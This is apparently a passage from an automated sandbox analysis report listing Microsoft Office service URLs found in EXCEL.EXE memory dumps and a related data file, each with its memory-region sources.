Source: EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookMBI_SSL_SHORT
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxs
Source: EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControlSyc
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13$
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://powerlift.acompli.net$
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect%x5
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventslJ
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://roaming.edog.
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://settings.outlook.com
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://settings.outlook.comS
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://staging.cortana.ai
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://staging.cortana.airl
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWriter~
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com6
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com:
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com=
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comB
Source: EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comP
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com_
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.coma
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comc
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.come
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comlg
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://tasks.office.com
